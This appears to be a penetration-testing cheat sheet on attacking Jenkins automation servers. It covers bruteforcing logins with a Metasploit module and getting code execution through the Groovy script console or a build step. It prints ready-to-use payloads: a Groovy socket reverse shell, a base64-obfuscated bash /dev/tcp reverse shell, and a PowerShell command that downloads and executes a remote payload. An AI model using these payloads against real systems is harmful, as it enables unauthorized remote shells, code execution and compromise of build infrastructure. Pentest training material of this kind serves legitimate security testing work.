Jenkins

"Jenkins is an open source automation server which enables developers around the world to reliably build, test, and deploy their software."

Bruteforcing passwords on Jenkins

Metasploit has a specific modules for that, too. This is especially efficient since Jenkins apparently does not possess any bruteforce protection scheme or password policy.

msf> use auxiliary/scanner/http/jenkins_login

Code execution on Jenkins

Use the groovy script engine

The easiest way for a penetration tester, since unlike the second method, it does involve creating or building any new Jenkins project.

The Jenkins groovy script engine can be found in the /script directory of your Jenkins install. It consists of a text box where scripts can be written and executed. Basic commands can be executed :

#For Windows
cmd.exe /c [commmand]
#For Linux
"[command].execute().text

But I know what you're here for : reverse shells !

Universal reverse shell

Thread.start {
String host="10.0.0.1";
int port=4242;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
}

Linux reverse shell

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Windows reverse shell

scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64>

Create a new Project

This method is not the ideal one since it is clearly isn't the pinnacle of discretion, and requires that our authenticated user has the right to create a new Jenkins project. If that is indeed the case, then ; -Create a new ('freestyle') project -Go the the 'Build section' => 'Execute Shell' and paste your payload (a powershell one is suggested) -Click on 'Build Now'

Metasploit

Metasploit has a code execution module automates the whole process, provided you have valid credentials ;

msf6 use exploit/multi/http/jenkins_script_console
PreviousPfsenseNextWordpress

Last updated

Was this helpful?